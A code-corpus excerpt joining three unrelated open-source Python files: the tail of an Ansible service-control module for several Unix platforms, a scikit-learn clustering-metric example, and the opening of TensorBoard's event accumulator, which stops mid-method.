svc_cmd = "%s %s" % (self.svc_cmd, self.name)
else:
# systemd commands take the form <cmd> <action> <name>
svc_cmd = self.svc_cmd
arguments = "%s %s" % (self.__systemd_unit, arguments)
elif self.svc_cmd is None and self.svc_initscript:
# upstart
svc_cmd = "%s" % self.svc_initscript
# In OpenRC, if a service crashed, we need to reset its status to
# stopped with the zap command, before we can start it back.
if self.svc_cmd and self.svc_cmd.endswith('rc-service') and self.action == 'start' and self.crashed:
self.execute_command("%s zap" % svc_cmd, daemonize=True)
if self.action != "restart":
if svc_cmd != '':
# upstart or systemd or OpenRC
rc_state, stdout, stderr = self.execute_command("%s %s %s" % (svc_cmd, self.action, arguments), daemonize=True)
else:
# SysV
rc_state, stdout, stderr = self.execute_command("%s %s %s" % (self.action, self.name, arguments), daemonize=True)
elif self.svc_cmd and self.svc_cmd.endswith('rc-service'):
# All services in OpenRC support restart.
rc_state, stdout, stderr = self.execute_command("%s %s %s" % (svc_cmd, self.action, arguments), daemonize=True)
else:
# In other systems, not all services support restart. Do it the hard way.
if svc_cmd != '':
# upstart or systemd
rc1, stdout1, stderr1 = self.execute_command("%s %s %s" % (svc_cmd, 'stop', arguments), daemonize=True)
else:
# SysV
rc1, stdout1, stderr1 = self.execute_command("%s %s %s" % ('stop', self.name, arguments), daemonize=True)
if self.sleep:
time.sleep(self.sleep)
if svc_cmd != '':
# upstart or systemd
rc2, stdout2, stderr2 = self.execute_command("%s %s %s" % (svc_cmd, 'start', arguments), daemonize=True)
else:
# SysV
rc2, stdout2, stderr2 = self.execute_command("%s %s %s" % ('start', self.name, arguments), daemonize=True)
# merge return information
if rc1 != 0 and rc2 == 0:
rc_state = rc2
stdout = stdout2
stderr = stderr2
else:
rc_state = rc1 + rc2
stdout = stdout1 + stdout2
stderr = stderr1 + stderr2
return (rc_state, stdout, stderr)
# ===========================================
# Subclass: FreeBSD
class FreeBsdService(Service):
"""
This is the FreeBSD Service manipulation class - it uses the /etc/rc.conf
file for controlling services started at boot and the 'service' binary to
check status and perform direct service manipulation.
"""
platform = 'FreeBSD'
distribution = None
def get_service_tools(self):
self.svc_cmd = self.module.get_bin_path('service', True)
if not self.svc_cmd:
self.module.fail_json(msg='unable to find service binary')
def get_service_status(self):
rc, stdout, stderr = self.execute_command("%s %s %s %s" % (self.svc_cmd, self.name, 'onestatus', self.arguments))
if self.name == "pf":
self.running = "Enabled" in stdout
else:
if rc == 1:
self.running = False
elif rc == 0:
self.running = True
def service_enable(self):
if self.enable:
self.rcconf_value = "YES"
else:
self.rcconf_value = "NO"
rcfiles = [ '/etc/rc.conf','/etc/rc.conf.local', '/usr/local/etc/rc.conf' ]
for rcfile in rcfiles:
if os.path.isfile(rcfile):
self.rcconf_file = rcfile
rc, stdout, stderr = self.execute_command("%s %s %s %s" % (self.svc_cmd, self.name, 'rcvar', self.arguments))
cmd = "%s %s %s %s" % (self.svc_cmd, self.name, 'rcvar', self.arguments)
rcvars = shlex.split(stdout, comments=True)
if not rcvars:
self.module.fail_json(msg="unable to determine rcvar", stdout=stdout, stderr=stderr)
# In rare cases, e.g. sendmail, rcvar can return several key=value pairs.
# Usually there is just one, however. In other rare cases, e.g. uwsgi,
# rcvar can return extra uncommented data that is not at all related to
# the rcvar. We will just take the first key=value pair we come across
# and hope for the best.
for rcvar in rcvars:
if '=' in rcvar:
self.rcconf_key = rcvar.split('=')[0]
break
if self.rcconf_key is None:
self.module.fail_json(msg="unable to determine rcvar", stdout=stdout, stderr=stderr)
try:
return self.service_enable_rcconf()
except:
self.module.fail_json(msg='unable to set rcvar')
def service_control(self):
if self.action is "start":
self.action = "onestart"
if self.action is "stop":
self.action = "onestop"
if self.action is "reload":
self.action = "onereload"
return self.execute_command("%s %s %s %s" % (self.svc_cmd, self.name, self.action, self.arguments))
# ===========================================
# Subclass: OpenBSD
class OpenBsdService(Service):
"""
This is the OpenBSD Service manipulation class - it uses rcctl(8) or
/etc/rc.d scripts for service control. Enabling a service is
only supported if rcctl is present.
"""
platform = 'OpenBSD'
distribution = None
def get_service_tools(self):
self.enable_cmd = self.module.get_bin_path('rcctl')
if self.enable_cmd:
self.svc_cmd = self.enable_cmd
else:
rcdir = '/etc/rc.d'
rc_script = "%s/%s" % (rcdir, self.name)
if os.path.isfile(rc_script):
self.svc_cmd = rc_script
if not self.svc_cmd:
self.module.fail_json(msg='unable to find svc_cmd')
def get_service_status(self):
if self.enable_cmd:
rc, stdout, stderr = self.execute_command("%s %s %s" % (self.svc_cmd, 'check', self.name))
else:
rc, stdout, stderr = self.execute_command("%s %s" % (self.svc_cmd, 'check'))
if stderr:
self.module.fail_json(msg=stderr)
if rc == 1:
self.running = False
elif rc == 0:
self.running = True
def service_control(self):
if self.enable_cmd:
return self.execute_command("%s -f %s %s" % (self.svc_cmd, self.action, self.name))
else:
return self.execute_command("%s -f %s" % (self.svc_cmd, self.action))
def service_enable(self):
if not self.enable_cmd:
return super(OpenBsdService, self).service_enable()
rc, stdout, stderr = self.execute_command("%s %s %s %s" % (self.enable_cmd, 'getdef', self.name, 'flags'))
if stderr:
self.module.fail_json(msg=stderr)
getdef_string = stdout.rstrip()
# Depending on the service the string returned from 'getdef' may be
# either a set of flags or the boolean YES/NO
if getdef_string == "YES" or getdef_string == "NO":
default_flags = ''
else:
default_flags = getdef_string
rc, stdout, stderr = self.execute_command("%s %s %s %s" % (self.enable_cmd, 'get', self.name, 'flags'))
if stderr:
self.module.fail_json(msg=stderr)
get_string = stdout.rstrip()
# Depending on the service the string returned from 'get' may be
# either a set of flags or the boolean YES/NO
if get_string == "YES" or get_string == "NO":
current_flags = ''
else:
current_flags = get_string
# If there are arguments from the user we use these as flags unless
# they are already set.
if self.arguments and self.arguments != current_flags:
changed_flags = self.arguments
# If the user has not supplied any arguments and the current flags
# differ from the default we reset them.
elif not self.arguments and current_flags != default_flags:
changed_flags = ' '
# Otherwise there is no need to modify flags.
else:
changed_flags = ''
rc, stdout, stderr = self.execute_command("%s %s %s %s" % (self.enable_cmd, 'get', self.name, 'status'))
if self.enable:
if rc == 0 and not changed_flags:
return
if rc != 0:
status_action = "set %s status on" % (self.name)
else:
status_action = ''
if changed_flags:
flags_action = "set %s flags %s" % (self.name, changed_flags)
else:
flags_action = ''
else:
if rc == 1:
return
status_action = "set %s status off" % self.name
flags_action = ''
# Verify state assumption
if not status_action and not flags_action:
self.module.fail_json(msg="neither status_action or status_flags is set, this should never happen")
if self.module.check_mode:
self.module.exit_json(changed=True, msg="changing service enablement")
status_modified = 0
if status_action:
rc, stdout, stderr = self.execute_command("%s %s" % (self.enable_cmd, status_action))
if rc != 0:
if stderr:
self.module.fail_json(msg=stderr)
else:
self.module.fail_json(msg="rcctl failed to modify service status")
status_modified = 1
if flags_action:
rc, stdout, stderr = self.execute_command("%s %s" % (self.enable_cmd, flags_action))
if rc != 0:
if stderr:
if status_modified:
error_message = "rcctl modified service status but failed to set flags: " + stderr
else:
error_message = stderr
else:
if status_modified:
error_message = "rcctl modified service status but failed to set flags"
else:
error_message = "rcctl failed to modify service flags"
self.module.fail_json(msg=error_message)
self.changed = True
# ===========================================
# Subclass: NetBSD
class NetBsdService(Service):
"""
This is the NetBSD Service manipulation class - it uses the /etc/rc.conf
file for controlling services started at boot, check status and perform
direct service manipulation. Init scripts in /etc/rc.d are used for
controlling services (start/stop) as well as for controlling the current
state.
"""
platform = 'NetBSD'
distribution = None
def get_service_tools(self):
initpaths = [ '/etc/rc.d' ] # better: $rc_directories - how to get in here? Run: sh -c '. /etc/rc.conf ; echo $rc_directories'
for initdir in initpaths:
initscript = "%s/%s" % (initdir,self.name)
if os.path.isfile(initscript):
self.svc_initscript = initscript
if not self.svc_initscript:
self.module.fail_json(msg='unable to find rc.d script')
def service_enable(self):
if self.enable:
self.rcconf_value = "YES"
else:
self.rcconf_value = "NO"
rcfiles = [ '/etc/rc.conf' ] # Overkill?
for rcfile in rcfiles:
if os.path.isfile(rcfile):
self.rcconf_file = rcfile
self.rcconf_key = "%s" % string.replace(self.name,"-","_")
return self.service_enable_rcconf()
def get_service_status(self):
self.svc_cmd = "%s" % self.svc_initscript
rc, stdout, stderr = self.execute_command("%s %s" % (self.svc_cmd, 'onestatus'))
if rc == 1:
self.running = False
elif rc == 0:
self.running = True
def service_control(self):
if self.action is "start":
self.action = "onestart"
if self.action is "stop":
self.action = "onestop"
self.svc_cmd = "%s" % self.svc_initscript
return self.execute_command("%s %s" % (self.svc_cmd, self.action), daemonize=True)
# ===========================================
# Subclass: SunOS
class SunOSService(Service):
"""
This is the SunOS Service manipulation class - it uses the svcadm
command for controlling services, and svcs command for checking status.
It also tries to be smart about taking the service out of maintenance
state if necessary.
"""
platform = 'SunOS'
distribution = None
def get_service_tools(self):
self.svcs_cmd = self.module.get_bin_path('svcs', True)
if not self.svcs_cmd:
self.module.fail_json(msg='unable to find svcs binary')
self.svcadm_cmd = self.module.get_bin_path('svcadm', True)
if not self.svcadm_cmd:
self.module.fail_json(msg='unable to find svcadm binary')
def get_service_status(self):
status = self.get_sunos_svcs_status()
# Only 'online' is considered properly running. Everything else is off
# or has some sort of problem.
if status == 'online':
self.running = True
else:
self.running = False
def get_sunos_svcs_status(self):
rc, stdout, stderr = self.execute_command("%s %s" % (self.svcs_cmd, self.name))
if rc == 1:
if stderr:
self.module.fail_json(msg=stderr)
else:
self.module.fail_json(msg=stdout)
lines = stdout.rstrip("\n").split("\n")
status = lines[-1].split(" ")[0]
# status is one of: online, offline, degraded, disabled, maintenance, uninitialized
# see man svcs(1)
return status
def service_enable(self):
# Get current service enablement status
rc, stdout, stderr = self.execute_command("%s -l %s" % (self.svcs_cmd, self.name))
if rc != 0:
if stderr:
self.module.fail_json(msg=stderr)
else:
self.module.fail_json(msg=stdout)
enabled = False
temporary = False
# look for enabled line, which could be one of:
# enabled true (temporary)
# enabled false (temporary)
# enabled true
# enabled false
for line in stdout.split("\n"):
if line.startswith("enabled"):
if "true" in line:
enabled = True
if "temporary" in line:
temporary = True
startup_enabled = (enabled and not temporary) or (not enabled and temporary)
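# A "(temporary)" marker means the current state is the opposite of the
# persistent boot-time setting, hence the XOR-style expression above.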
if self.enable and startup_enabled:
return
elif (not self.enable) and (not startup_enabled):
return
# Mark service as started or stopped (this will have the side effect of
# actually stopping or starting the service)
if self.enable:
subcmd = "enable -rs"
else:
subcmd = "disable -s"
rc, stdout, stderr = self.execute_command("%s %s %s" % (self.svcadm_cmd, subcmd, self.name))
if rc != 0:
if stderr:
self.module.fail_json(msg=stderr)
else:
self.module.fail_json(msg=stdout)
self.changed = True
def service_control(self):
status = self.get_sunos_svcs_status()
# if starting or reloading, clear maintenance states
if self.action in ['start', 'reload', 'restart'] and status in ['maintenance', 'degraded']:
rc, stdout, stderr = self.execute_command("%s clear %s" % (self.svcadm_cmd, self.name))
if rc != 0:
return rc, stdout, stderr
status = self.get_sunos_svcs_status()
if status in ['maintenance', 'degraded']:
self.module.fail_json(msg="Failed to bring service out of %s status." % status)
if self.action == 'start':
subcmd = "enable -rst"
elif self.action == 'stop':
subcmd = "disable -st"
elif self.action == 'reload':
subcmd = "refresh"
elif self.action == 'restart' and status == 'online':
subcmd = "restart"
elif self.action == 'restart' and status != 'online':
subcmd = "enable -rst"
return self.execute_command("%s %s %s" % (self.svcadm_cmd, subcmd, self.name))
# ===========================================
# Subclass: AIX
class AIX(Service):
"""
This is the AIX Service (SRC) manipulation class - it uses lssrc, startsrc, stopsrc
and refresh for service control. Enabling a service is currently not supported.
Would require to add an entry in the /etc/inittab file (mkitab, chitab and rmitab
commands)
"""
platform = 'AIX'
distribution = None
def get_service_tools(self):
self.lssrc_cmd = self.module.get_bin_path('lssrc', True)
if not self.lssrc_cmd:
self.module.fail_json(msg='unable to find lssrc binary')
self.startsrc_cmd = self.module.get_bin_path('startsrc', True)
if not self.startsrc_cmd:
self.module.fail_json(msg='unable to find startsrc binary')
self.stopsrc_cmd = self.module.get_bin_path('stopsrc', True)
if not self.stopsrc_cmd:
self.module.fail_json(msg='unable to find stopsrc binary')
self.refresh_cmd = self.module.get_bin_path('refresh', True)
if not self.refresh_cmd:
self.module.fail_json(msg='unable to find refresh binary')
def get_service_status(self):
status = self.get_aix_src_status()
# Only 'active' is considered properly running. Everything else is off
# or has some sort of problem.
if status == 'active':
self.running = True
else:
self.running = False
def get_aix_src_status(self):
rc, stdout, stderr = self.execute_command("%s -s %s" % (self.lssrc_cmd, self.name))
if rc == 1:
if stderr:
self.module.fail_json(msg=stderr)
else:
self.module.fail_json(msg=stdout)
lines = stdout.rstrip("\n").split("\n")
status = lines[-1].split(" ")[-1]
# status is one of: active, inoperative
return status
def service_control(self):
if self.action == 'start':
srccmd = self.startsrc_cmd
elif self.action == 'stop':
srccmd = self.stopsrc_cmd
elif self.action == 'reload':
srccmd = self.refresh_cmd
elif self.action == 'restart':
self.execute_command("%s -s %s" % (self.stopsrc_cmd, self.name))
srccmd = self.startsrc_cmd
if self.arguments and self.action == 'start':
return self.execute_command("%s -a \"%s\" -s %s" % (srccmd, self.arguments, self.name))
else:
return self.execute_command("%s -s %s" % (srccmd, self.name))
# ===========================================
# Main control flow
def main():
module = AnsibleModule(
argument_spec = dict(
name = dict(required=True),
state = dict(choices=['running', 'started', 'stopped', 'restarted', 'reloaded']),
sleep = dict(required=False, type='int', default=None),
pattern = dict(required=False, default=None),
enabled = dict(type='bool'),
runlevel = dict(required=False, default='default'),
arguments = dict(aliases=['args'], default=''),
must_exist = dict(type='bool', default=True),
),
supports_check_mode=True
)
if module.params['state'] is None and module.params['enabled'] is None:
module.fail_json(msg="Neither 'state' nor 'enabled' set")
service = Service(module)
if service.syslogging:
syslog.openlog('ansible-%s' % os.path.basename(__file__))
syslog.syslog(syslog.LOG_NOTICE, 'Service instantiated - platform %s' % service.platform)
if service.distribution:
syslog.syslog(syslog.LOG_NOTICE, 'Service instantiated - distribution %s' % service.distribution)
rc = 0
out = ''
err = ''
result = {}
result['name'] = service.name
# Find service management tools
service.get_service_tools()
# Enable/disable service startup at boot if requested
if service.module.params['enabled'] is not None:
# FIXME: ideally this should detect if we need to toggle the enablement state, though
# it's unlikely the changed handler would need to fire in this case so it's a minor thing.
service.service_enable()
result['enabled'] = service.enable
if module.params['state'] is None:
# Not changing the running state, so bail out now.
result['changed'] = service.changed
module.exit_json(**result)
result['state'] = service.state
# Collect service status
if service.pattern:
service.check_ps()
else:
service.get_service_status()
# Calculate if request will change service state
service.check_service_changed()
# Modify service state if necessary
(rc, out, err) = service.modify_service_state()
if rc != 0:
if err and "Job is already running" in err:
# upstart got confused, one such possibility is MySQL on Ubuntu 12.04
# where status may report it has no start/stop links and we could
# not get accurate status
pass
else:
if err:
module.fail_json(msg=err)
else:
module.fail_json(msg=out)
result['changed'] = service.changed | service.svc_change
if service.module.params['enabled'] is not None:
result['enabled'] = service.module.params['enabled']
if not service.module.params['state']:
status = service.get_service_status()
if status is None:
result['state'] = 'absent'
elif status is False:
# get_service_status() reports the running state, so False means stopped
result['state'] = 'stopped'
else:
result['state'] = 'started'
else:
# as we may have just bounced the service the service command may not
# report accurate state at this moment so just show what we ran
if service.module.params['state'] in ['started','restarted','running','reloaded']:
result['state'] = 'started'
else:
result['state'] = 'stopped'
module.exit_json(**result)
from ansible.module_utils.basic import *
main()
| gpl-3.0 |
ominux/scikit-learn | examples/cluster/plot_adjusted_for_chance_measures.py | 1 | 4105 | """
==========================================================
Adjustment for chance in clustering performance evaluation
==========================================================
The following plots demonstrate the impact of the number of clusters and
number of samples on various clustering performance evaluation metrics.
Non-adjusted measures such as the V-Measure show a dependency between
the number of clusters and the number of samples: the mean V-Measure
of random labelings increases significantly as the number of clusters gets
closer to the total number of samples used to compute the measure.
Adjusted-for-chance measures such as ARI display some random variations
centered around a mean score of 0.0 for any number of samples and
clusters.
Hence only adjusted measures can safely be used as a consensus index
to evaluate the average stability of clustering algorithms for a given
value of k on various overlapping sub-samples of the dataset.
"""
print __doc__
# Author: Olivier Grisel <[email protected]>
# License: Simplified BSD
import numpy as np
import pylab as pl
from sklearn import metrics
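# Quick illustration (sketch) of the effect discussed above: for two random
# labelings, the adjusted Rand index stays near 0.0 while the non-adjusted
# V-measure can be noticeably positive:
#   labels_a = np.random.randint(0, 10, 100)
#   labels_b = np.random.randint(0, 10, 100)
#   metrics.adjusted_rand_score(labels_a, labels_b)  # ~0.0
#   metrics.v_measure_score(labels_a, labels_b)      # clearly > 0.0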
def uniform_labelings_scores(score_func, n_samples, n_clusters_range,
fixed_n_classes=None, n_runs=10, seed=42):
"""Compute score for 2 random uniform cluster labelings.
Both random labelings have the same number of clusters for each possible
value in ``n_clusters_range``.
When fixed_n_classes is not None the first labeling is considered a ground
truth class assignment with a fixed number of classes.
"""
random_labels = np.random.RandomState(seed).random_integers
scores = np.zeros((len(n_clusters_range), n_runs))
if fixed_n_classes is not None:
labels_a = random_labels(low=0, high=fixed_n_classes - 1,
size=n_samples)
for i, k in enumerate(n_clusters_range):
for j in range(n_runs):
if fixed_n_classes is None:
labels_a = random_labels(low=0, high=k - 1, size=n_samples)
labels_b = random_labels(low=0, high=k - 1, size=n_samples)
scores[i, j] = score_func(labels_a, labels_b)
return scores
score_funcs = [
metrics.adjusted_rand_score,
metrics.v_measure_score,
]
# 2 independent random clusterings with equal cluster number
n_samples = 100
n_clusters_range = np.linspace(2, n_samples, 10).astype(np.int)
pl.figure(1)
plots = []
names = []
for score_func in score_funcs:
print "Computing %s for %d values of n_clusters and n_samples=%d" % (
score_func.__name__, len(n_clusters_range), n_samples)
scores = uniform_labelings_scores(score_func, n_samples, n_clusters_range)
plots.append(pl.errorbar(
n_clusters_range, scores.mean(axis=1), scores.std(axis=1)))
names.append(score_func.__name__)
pl.title("Clustering measures for 2 random uniform labelings\n"
"with equal number of clusters")
pl.xlabel('Number of clusters (Number of samples is fixed to %d)' % n_samples)
pl.ylabel('Score value')
pl.legend(plots, names)
pl.ylim(ymin=-0.05, ymax=1.05)
pl.show()
# Random labeling with varying n_clusters against ground class labels
# with fixed number of clusters
n_samples = 1000
n_clusters_range = np.linspace(2, 100, 10).astype(np.int)
n_classes = 10
pl.figure(2)
plots = []
names = []
for score_func in score_funcs:
print "Computing %s for %d values of n_clusters and n_samples=%d" % (
score_func.__name__, len(n_clusters_range), n_samples)
scores = uniform_labelings_scores(score_func, n_samples, n_clusters_range,
fixed_n_classes=n_classes)
plots.append(pl.errorbar(
n_clusters_range, scores.mean(axis=1), scores.std(axis=1)))
names.append(score_func.__name__)
pl.title("Clustering measures for random uniform labeling\n"
"against reference assignement with %d classes" % n_classes)
pl.xlabel('Number of clusters (Number of samples is fixed to %d)' % n_samples)
pl.ylabel('Score value')
pl.ylim(ymin=-0.05, ymax=1.05)
pl.legend(plots, names)
pl.show()
| bsd-3-clause |
sugartom/tensorflow-alien | tensorflow/tensorboard/backend/event_processing/event_accumulator.py | 2 | 30610 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Takes a generator of values, and accumulates them for a frontend."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import os
import re
import threading
import numpy as np
from tensorflow.core.framework import graph_pb2
from tensorflow.core.protobuf import meta_graph_pb2
from tensorflow.core.protobuf.config_pb2 import RunMetadata
from tensorflow.core.util.event_pb2 import SessionLog
from tensorflow.python.framework import tensor_util
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.util import compat
from tensorflow.tensorboard.backend.event_processing import directory_watcher
from tensorflow.tensorboard.backend.event_processing import event_file_loader
from tensorflow.tensorboard.backend.event_processing import reservoir
namedtuple = collections.namedtuple
ScalarEvent = namedtuple('ScalarEvent', ['wall_time', 'step', 'value'])
HealthPillEvent = namedtuple(
'HealthPillEvent',
['wall_time', 'step', 'node_name', 'output_slot', 'value'])
CompressedHistogramEvent = namedtuple('CompressedHistogramEvent',
['wall_time', 'step',
'compressed_histogram_values'])
CompressedHistogramValue = namedtuple('CompressedHistogramValue',
['basis_point', 'value'])
HistogramEvent = namedtuple('HistogramEvent',
['wall_time', 'step', 'histogram_value'])
HistogramValue = namedtuple('HistogramValue', ['min', 'max', 'num', 'sum',
'sum_squares', 'bucket_limit',
'bucket'])
ImageEvent = namedtuple('ImageEvent', ['wall_time', 'step',
'encoded_image_string', 'width',
'height'])
AudioEvent = namedtuple('AudioEvent', ['wall_time', 'step',
'encoded_audio_string', 'content_type',
'sample_rate', 'length_frames'])
TensorEvent = namedtuple('TensorEvent', ['wall_time', 'step', 'tensor_proto'])
## Different types of summary events handled by the event_accumulator
SUMMARY_TYPES = {
'simple_value': '_ProcessScalar',
'histo': '_ProcessHistogram',
'image': '_ProcessImage',
'audio': '_ProcessAudio',
'tensor': '_ProcessTensor',
}
## The tagTypes below are just arbitrary strings chosen to pass the type
## information of the tag from the backend to the frontend
COMPRESSED_HISTOGRAMS = 'compressedHistograms'
HISTOGRAMS = 'histograms'
IMAGES = 'images'
AUDIO = 'audio'
SCALARS = 'scalars'
TENSORS = 'tensors'
HEALTH_PILLS = 'health_pills'
GRAPH = 'graph'
META_GRAPH = 'meta_graph'
RUN_METADATA = 'run_metadata'
## Normal CDF for std_devs: (-Inf, -1.5, -1, -0.5, 0, 0.5, 1, 1.5, Inf)
## naturally gives bands around median of width 1 std dev, 2 std dev, 3 std dev,
## and then the long tail.
NORMAL_HISTOGRAM_BPS = (0, 668, 1587, 3085, 5000, 6915, 8413, 9332, 10000)
DEFAULT_SIZE_GUIDANCE = {
COMPRESSED_HISTOGRAMS: 500,
IMAGES: 4,
AUDIO: 4,
SCALARS: 10000,
# We store this many health pills per op.
HEALTH_PILLS: 100,
HISTOGRAMS: 1,
TENSORS: 10,
}
STORE_EVERYTHING_SIZE_GUIDANCE = {
COMPRESSED_HISTOGRAMS: 0,
IMAGES: 0,
AUDIO: 0,
SCALARS: 0,
HEALTH_PILLS: 0,
HISTOGRAMS: 0,
TENSORS: 0,
}
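# Example (sketch): a custom guidance that keeps every scalar but only one
# image per tag (a size of 0 means "store everything"):
#   my_sizes = dict(DEFAULT_SIZE_GUIDANCE)
#   my_sizes[SCALARS] = 0
#   my_sizes[IMAGES] = 1
#   acc = EventAccumulator('/tmp/my_run', size_guidance=my_sizes)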
# The tag that values containing health pills have. Health pill data is stored
# in tensors. In order to distinguish health pill values from scalar values, we
# rely on how health pill values have this special tag value.
HEALTH_PILL_EVENT_TAG = '__health_pill__'
def IsTensorFlowEventsFile(path):
"""Check the path name to see if it is probably a TF Events file.
Args:
path: A file path to check if it is an event file.
Raises:
ValueError: If the path is an empty string.
Returns:
True if path is formatted like a TensorFlow events file.
"""
if not path:
raise ValueError('Path must be a nonempty string')
return 'tfevents' in compat.as_str_any(os.path.basename(path))
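# For example (sketch; paths are hypothetical):
#   IsTensorFlowEventsFile('/logs/events.out.tfevents.1490000000.myhost')  # True
#   IsTensorFlowEventsFile('/logs/checkpoint')                             # False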
class EventAccumulator(object):
"""An `EventAccumulator` takes an event generator, and accumulates the values.
The `EventAccumulator` is intended to provide a convenient Python interface
for loading Event data written during a TensorFlow run. TensorFlow writes out
`Event` protobuf objects, which have a timestamp and step number, and often
contain a `Summary`. Summaries can have different kinds of data like an image,
a scalar value, or a histogram. The Summaries also have a tag, which we use to
organize logically related data. The `EventAccumulator` supports retrieving
the `Event` and `Summary` data by its tag.
Calling `Tags()` gets a map from `tagType` (e.g. `'images'`,
`'compressedHistograms'`, `'scalars'`, etc) to the associated tags for those
data types. Then, various functional endpoints (e.g.
`Accumulator.Scalars(tag)`) allow for the retrieval of all data
associated with that tag.
The `Reload()` method synchronously loads all of the data written so far.
Histograms, audio, and images are very large, so storing all of them is not
recommended.
@@Tensors
"""
def __init__(self,
path,
size_guidance=DEFAULT_SIZE_GUIDANCE,
compression_bps=NORMAL_HISTOGRAM_BPS,
purge_orphaned_data=True):
"""Construct the `EventAccumulator`.
Args:
path: A file path to a directory containing tf events files, or a single
tf events file. The accumulator will load events from this path.
size_guidance: Information on how much data the EventAccumulator should
store in memory. The DEFAULT_SIZE_GUIDANCE tries not to store too much
so as to avoid OOMing the client. The size_guidance should be a map
from a `tagType` string to an integer representing the number of
items to keep per tag for items of that `tagType`. If the size is 0,
all events are stored.
compression_bps: Information on how the `EventAccumulator` should compress
histogram data for the `CompressedHistograms` tag (for details see
`ProcessCompressedHistogram`).
purge_orphaned_data: Whether to discard any events that were "orphaned" by
a TensorFlow restart.
"""
sizes = {}
for key in DEFAULT_SIZE_GUIDANCE:
if key in size_guidance:
sizes[key] = size_guidance[key]
else:
sizes[key] = DEFAULT_SIZE_GUIDANCE[key]
self._first_event_timestamp = None
self._scalars = reservoir.Reservoir(size=sizes[SCALARS])
# Unlike the other reservoir, the reservoir for health pills is keyed by the
# name of the op instead of the tag. This lets us efficiently obtain the
# health pills per node.
self._health_pills = reservoir.Reservoir(size=sizes[HEALTH_PILLS])
self._graph = None
self._graph_from_metagraph = False
self._meta_graph = None
self._tagged_metadata = {}
self._histograms = reservoir.Reservoir(size=sizes[HISTOGRAMS])
self._compressed_histograms = reservoir.Reservoir(
size=sizes[COMPRESSED_HISTOGRAMS], always_keep_last=False)
self._images = reservoir.Reservoir(size=sizes[IMAGES])
self._audio = reservoir.Reservoir(size=sizes[AUDIO])
self._tensors = reservoir.Reservoir(size=sizes[TENSORS])
self._generator_mutex = threading.Lock()
self._generator = _GeneratorFromPath(path)
self._compression_bps = compression_bps
self.purge_orphaned_data = purge_orphaned_data
self.most_recent_step = -1
self.most_recent_wall_time = -1
self.file_version = None
# The attributes that get built up by the accumulator
self.accumulated_attrs = ('_scalars', '_histograms',
'_compressed_histograms', '_images', '_audio')
self._tensor_summaries = {}
def Reload(self):
"""Loads all events added since the last call to `Reload`.
If `Reload` was never called, loads all events in the file.
Returns:
The `EventAccumulator`.
"""
with self._generator_mutex:
for event in self._generator.Load():
self._ProcessEvent(event)
return self
def FirstEventTimestamp(self):
"""Returns the timestamp in seconds of the first event.
If the first event has been loaded (either by this method or by `Reload`),
this returns immediately. Otherwise, it will load in the first event. Note
that this means that calling `Reload` will cause this to block until
`Reload` has finished.
Returns:
The timestamp in seconds of the first event that was loaded.
Raises:
ValueError: If no events have been loaded and there were no events found
on disk.
"""
if self._first_event_timestamp is not None:
return self._first_event_timestamp
with self._generator_mutex:
try:
event = next(self._generator.Load())
self._ProcessEvent(event)
return self._first_event_timestamp
except StopIteration:
raise ValueError('No event timestamp could be found')
def _ProcessEvent(self, event):
"""Called whenever an event is loaded."""
if self._first_event_timestamp is None:
self._first_event_timestamp = event.wall_time
if event.HasField('file_version'):
new_file_version = _ParseFileVersion(event.file_version)
if self.file_version and self.file_version != new_file_version:
## This should not happen.
logging.warn(('Found new file_version for event.proto. This will '
'affect purging logic for TensorFlow restarts. '
'Old: {0} New: {1}').format(self.file_version,
new_file_version))
self.file_version = new_file_version
self._MaybePurgeOrphanedData(event)
## Process the event.
# GraphDef and MetaGraphDef are handled in a special way:
# If no graph_def Event is available, but a meta_graph_def is, and it
# contains a graph_def, then use the meta_graph_def.graph_def as our graph.
# If a graph_def Event is available, always prefer it to the graph_def
# inside the meta_graph_def.
if event.HasField('graph_def'):
if self._graph is not None:
logging.warn(('Found more than one graph event per run, or there was '
'a metagraph containing a graph_def, as well as one or '
'more graph events. Overwriting the graph with the '
'newest event.'))
self._graph = event.graph_def
self._graph_from_metagraph = False
elif event.HasField('meta_graph_def'):
if self._meta_graph is not None:
logging.warn(('Found more than one metagraph event per run. '
'Overwriting the metagraph with the newest event.'))
self._meta_graph = event.meta_graph_def
if self._graph is None or self._graph_from_metagraph:
# We may have a graph_def in the metagraph. If so, and no
# graph_def is directly available, use this one instead.
meta_graph = meta_graph_pb2.MetaGraphDef()
meta_graph.ParseFromString(self._meta_graph)
if meta_graph.graph_def:
if self._graph is not None:
logging.warn(('Found multiple metagraphs containing graph_defs, '
'but did not find any graph events. Overwriting the '
'graph with the newest metagraph version.'))
self._graph_from_metagraph = True
self._graph = meta_graph.graph_def.SerializeToString()
elif event.HasField('tagged_run_metadata'):
tag = event.tagged_run_metadata.tag
if tag in self._tagged_metadata:
logging.warn('Found more than one "run metadata" event with tag ' +
tag + '. Overwriting it with the newest event.')
self._tagged_metadata[tag] = event.tagged_run_metadata.run_metadata
elif event.HasField('summary'):
for value in event.summary.value:
if value.HasField('tensor') and value.tag == HEALTH_PILL_EVENT_TAG:
self._ProcessHealthPillSummary(value, event)
else:
for summary_type, summary_func in SUMMARY_TYPES.items():
if value.HasField(summary_type):
datum = getattr(value, summary_type)
tag = value.node_name if summary_type == 'tensor' else value.tag
getattr(self, summary_func)(tag, event.wall_time, event.step,
datum)
def _ProcessHealthPillSummary(self, value, event):
"""Process summaries containing health pills.
These summaries are distinguished by the fact that they have a Tensor field
and have a special tag value.
This method emits ERROR-level messages to the logs if it encounters Tensor
summaries that it cannot process.
Args:
value: A summary_pb2.Summary.Value with a Tensor field.
event: The event_pb2.Event containing that value.
"""
elements = tensor_util.MakeNdarray(value.tensor)
# The node_name property of the value object is actually a watch key: a
# combination of node name, output slot, and a suffix. We capture the
# actual node name and the output slot with a regular expression.
match = re.match(r'^(.*):(\d+):DebugNumericSummary$', value.node_name)
if not match:
logging.log_first_n(
logging.ERROR,
'Unsupported watch key %s for health pills; skipping this sequence.',
1,
value.node_name)
return
node_name = match.group(1)
output_slot = int(match.group(2))
